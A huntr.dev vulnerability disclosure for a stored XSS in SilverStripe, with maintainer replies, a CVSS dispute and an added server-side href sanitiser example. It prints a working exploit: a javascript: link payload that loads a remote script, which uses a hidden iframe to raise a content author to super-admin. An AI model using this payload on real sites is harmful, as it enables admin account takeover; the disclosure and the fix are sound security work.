Stored XSS bug to hijack admin account in silverstripe/silverstripe-framework
Reported on
Mar 27th 2022
Description
Using this XSS, a lower-level user can change their role to super-admin and hijack the admin account.
Proof of Concept
1. First, from the super-admin account, go to http://localhost/silverstripe/admin/security/#Root_Users and add user-B as a content author. Also give user-B permission to the Pages section only.
2. Now, from the user-B account, go to any page and edit it: http://localhost/silverstripe/admin/pages/edit/show/7. After editing, save it; the request below is sent to the server:
POST /silverstripe/admin/pages/edit/EditForm/7/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Pjax: CurrentForm,Breadcrumbs
X-Requested-With: XMLHttpRequest
Content-Length: 1967
Origin: http://localhost
Connection: close
Referer: http://localhost/silverstripe/admin/pages/edit/show/7
Cookie:
Title=admin-pageNew+Page&URLSegment=admin-pagenew-page&MenuTitle=admin-pageNew+Page&Content=%3Cp%3E%3Ca+title%3D%22jhkh%22+href%3D%22javascript:alert(document.domain)%22%3Esd%3C%2Fa%3E%3C%2Fp%3E&MetaDescription=&ExtraMeta=&ClassName=Page&ParentID=0&SecurityID=5aa9e58c341853a9f4b5320d938debaf514a8b50&ID=7&AbsoluteLink=http%3A%2F%2Flocalhost%2Fsilverstripe%2Fadmin-pagenew-page%2F&LiveLink=http%3A%2F%2Flocalhost%2Fsilverstripe%2Fadmin-pagenew-page%2F%3Fstage%3DLive&StageLink=http%3A%2F%2Flocalhost%2Fsilverstripe%2Fadmin-pagenew-page%2F%3Fstage%3DStage&ArchiveWarningMessage=Warning%3A+This+page+and+all+of+its+child+pages+will+be+unpublished+before+being+sent+to+the+archive.%5Cn%5CnAre+you+sure+you+want+to+proceed%3F&TreeTitle=%3Cspan+class%3D%22jstree-pageicon+page-icon+font-icon-page+class-Page%22%3E%3C%2Fspan%3E%3Cspan+class%3D%22item%22+data-allowedchildren%3D%22%5B%7B%26quot%3BClassName%26quot%3B%3A%26quot%3BPage%26quot%3B%2C%26quot%3BTitle%26quot%3B%3A%26quot%3BPage%26quot%3B%2C%26quot%3BIconClass%26quot%3B%3A%26quot%3Bfont-icon-page%26quot%3B%7D%2C%7B%26quot%3BClassName%26quot%3B%3A%26quot%3BSilverStripe%5C%5CErrorPage%5C%5CErrorPage%26quot%3B%2C%26quot%3BTitle%26quot%3B%3A%26quot%3BError+Page%26quot%3B%2C%26quot%3BIconClass%26quot%3B%3A%26quot%3Bfont-icon-p-error%26quot%3B%7D%2C%7B%26quot%3BClassName%26quot%3B%3A%26quot%3BSilverStripe%5C%5CCMS%5C%5CModel%5C%5CRedirectorPage%26quot%3B%2C%26quot%3BTitle%26quot%3B%3A%26quot%3BRedirector+Page%26quot%3B%2C%26quot%3BIconClass%26quot%3B%3A%26quot%3Bfont-icon-p-redirect%26quot%3B%7D%2C%7B%26quot%3BClassName%26quot%3B%3A%26quot%3BSilverStripe%5C%5CCMS%5C%5CModel%5C%5CVirtualPage%26quot%3B%2C%26quot%3BTitle%26quot%3B%3A%26quot%3BVirtual+Page%26quot%3B%2C%26quot%3BIconClass%26quot%3B%3A%26quot%3Bfont-icon-p-virtual%26quot%3B%7D%5D%22%3Eadmin-pageNew+Page%3C%2Fspan%3E&Action=split&action_save=1&BackURL=http%3A%2F%2Flocalhost%2Fsilverstripe%2Fadmin%2Fpages%2Fedit%2Fshow%2F7
Here, in this request, the XSS payload %3Cp%3E%3Ca+title%3D%22jhkh%22+href%3D%22javascript:alert(document.domain)%22%3Esd%3C%2Fa%3E%3C%2Fp%3E is put in the Content parameter.
If you decode it you get <p><a title="jhkh" href="javascript:alert(document.domain)">sd</a></p>, where the JavaScript code javascript:alert(document.domain) is supplied as the link target.
3. Now go to the admin account, open the above page at http://localhost/silverstripe/admin-pagenew-page?stage=Stage, click the link in the page and see that the XSS is executed.
EXPLOIT
- Tested browser is Chrome on Linux.
- Admin is logged in to his account.
- SilverStripe installation at http://localhost/silverstripe
Let the attacker be user-B, who wants to change his role from "Content authors" to super-admin using this XSS. So user-B now uses the XSS payload below in the above Content parameter:
%3Cp%3E%3Ca+title%3D%22jhkh%22+href%3D%22javascript:var+a=document.createElement('script');a.src='http://localhost/silver.js';document.body.appendChild(a)%22%3Esd%3C%2Fa%3E%3C%2Fp%3E
If you decode this payload you get:
<p><a title="jhkh" href="javascript:var a=document.createElement('script');a.src='http://localhost/silver.js';document.body.appendChild(a)">sd</a></p>
Flow
1. user-B (attacker) provides the above XSS payload in the page content.
2. The admin opens the page and clicks the link; the JavaScript code is executed.
3. A new JavaScript file is downloaded from http://localhost/silver.js and executed.
4. The malicious JavaScript code now sends a POST request to POST /silverstripe/admin/pages/edit/EditForm/1/ to change user-B's (attacker's) role from "Content authors" to super-admin.
Now user-B has become super-admin.
Content of the malicious JavaScript:
function prepareFrame() {
    var ifrm = document.createElement("iframe");
    ifrm.setAttribute("src", "http://localhost/silverstripe/admin/security/EditForm/field/Members/item/2/edit"); // attacker loads the member edit form into a hidden iframe to change the role
    ifrm.style.width = "0";
    ifrm.style.height = "0";
    ifrm.setAttribute("id", "hack");
    document.body.appendChild(ifrm);
}
prepareFrame();
var myTimeout = setTimeout(fireing, 6000); // wait for the iframe to finish loading
function fireing() {
    document.getElementById("hack").contentWindow.document.getElementById("Form_ItemEditForm_DirectGroups").value = 2; // change group to super-admin
    document.getElementById("hack").contentWindow.document.getElementById("Form_ItemEditForm_action_doSave").click(); // submit the form
}
VIDEO POC
https://drive.google.com/file/d/1BXa-h79YgaF4hSdHyOd2kiyBn16rO9Xv/view?usp=sharing
Impact
Using this XSS, a "content author" can execute arbitrary JavaScript code in the admin's account. So "Content authors" can change their role to super-admin using this XSS.
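The root cause the maintainer confirms below is that `javascript:` link targets in stored page content are not rejected server side. The following is an added example, not SilverStripe's code, of the kind of server-side allow-list check on anchor hrefs that closes this class of bug: it pulls the Content field out of a form body shaped like the PoC request, normalises each href the way a browser would before reading its scheme, and neutralises any link whose scheme is not on the allow-list. The sample body is constructed; the regex-based anchor matching keeps the example short and a real fix would operate on a parsed DOM.

```javascript
// Added example (not SilverStripe code): server-side scheme allow-list for anchor
// hrefs in stored HTML. Regexes stand in for a real HTML parser to keep it short.
const SAFE_SCHEMES = new Set(["http", "https", "mailto", "tel"]);

// Normalise a raw href the way a browser does before it reads the scheme:
// decode HTML entities, strip leading/trailing C0 controls and spaces,
// remove embedded tabs and newlines, lower-case.
function normaliseHref(raw) {
  const named = { lt: "<", gt: ">", quot: '"', amp: "&" };
  const s = raw
    .replace(/&#x([0-9a-f]+);?/gi, (_, h) => String.fromCodePoint(parseInt(h, 16)))
    .replace(/&#(\d+);?/g, (_, d) => String.fromCodePoint(Number(d)))
    .replace(/&(lt|gt|quot|amp);/gi, (_, e) => named[e.toLowerCase()]);
  return s.replace(/^[\u0000-\u0020]+|[\u0000-\u0020]+$/g, "")
          .replace(/[\t\n\r]/g, "")
          .toLowerCase();
}

// A href is safe if it is relative (no scheme) or its scheme is allow-listed.
function isSafeHref(raw) {
  const m = /^([a-z][a-z0-9+.-]*):/.exec(normaliseHref(raw));
  if (!m) return true; // "/page", "#Root_Users", "page.html" and so on
  return SAFE_SCHEMES.has(m[1]);
}

// Rewrite the href of every <a> that fails the check so the link is inert.
function sanitiseAnchors(html) {
  let dropped = 0;
  const out = html.replace(/<a\b([^>]*)>/gi, (tag, attrs) => {
    const m = /\bhref\s*=\s*("([^"]*)"|'([^']*)'|([^\s>]+))/i.exec(attrs);
    if (!m) return tag;
    const value = m[2] ?? m[3] ?? m[4];
    if (isSafeHref(value)) return tag;
    dropped++;
    return `<a${attrs.replace(m[0], 'href="#"')}>`;
  });
  return { html: out, dropped };
}

// Pull the Content field out of a URL-encoded form body like the PoC request.
function contentFromFormBody(body) {
  return new URLSearchParams(body).get("Content") ?? "";
}

// Constructed sample body: the PoC's Content value plus one benign link.
const SAMPLE_BODY = "Title=x&Content=" + encodeURIComponent(
  '<p><a title="jhkh" href="javascript:alert(document.domain)">sd</a> ' +
  '<a href="https://example.org/">ok</a></p>');
```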
Thanks, we replicated this issue at our end. It's a general issue where javascript: in href attributes is not removed server side.
Could you please confirm if you'd like to be acknowledged in the official disclosure? Would crediting you as follows be OK?
ranjit-git via huntr.dev
Regards, Steve Boyd, Silverstripe Product Developer
It is a valid issue.
It is not fixed though, and we do not have an ETA yet.
Regards, Steve Boyd, Silverstripe Product Developer
@maintainer - thanks for the heads up 👍
You can go ahead and mark it as valid using the drop-down below when you are ready. A CVE will not be assigned and the report will remain private.
Only once the fix has been confirmed against the report will it go public :)
@maintainer I have shown you how an attacker can become super-admin using this XSS bug, and then a lower-level user can perform any activity as super-admin. I have escalated to maximum severity here. I think severity should be high. Here is the CVSS score: https://ibb.co/n69gDmZ https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H&version=3.1 Can you please tell me how you calculated the CVSS score?
Attack Vector --> Network
Attack Complexity --> Low
Privileges Required --> Low --> low-level privileges required
User Interaction --> Required --> because the user has to click the attacker's payload
Scope --> Changed --> because scope is changed to super-admin from a lower-level user
Confidentiality Impact --> High --> because the attacker gets all confidential information
Integrity Impact --> High --> because the attacker can perform any activity as super-admin
Availability Impact --> High --> because all information is available to the attacker
@admin can you look into the CVSS score here? I could have submitted this report as just an "XSS bug", nothing fancy, and it would easily fall under medium severity. But huntr now looks for severity-based reports, and the bounty is calculated based on that. So I escalated it to the maximum impact the attacker can achieve. Using this bug the attacker escalates himself to super-admin and fully hijacks the account of the existing super-admin. After becoming super-admin the attacker has full control over the dashboard.
Hi Ranjit, given the report content, the maintainer has defined the severity of this security issue. We (huntr) don't influence the severity of reports as the maintainers know their project best.
@admin Then there is no need for severity-based reports. Why the extra work to show the severity of the bug if it is not considered?
Hi Ranjit. Let's please stay on topic. If you have no other questions regarding this specific report, then let's take the conversation offline so as to not spam this channel.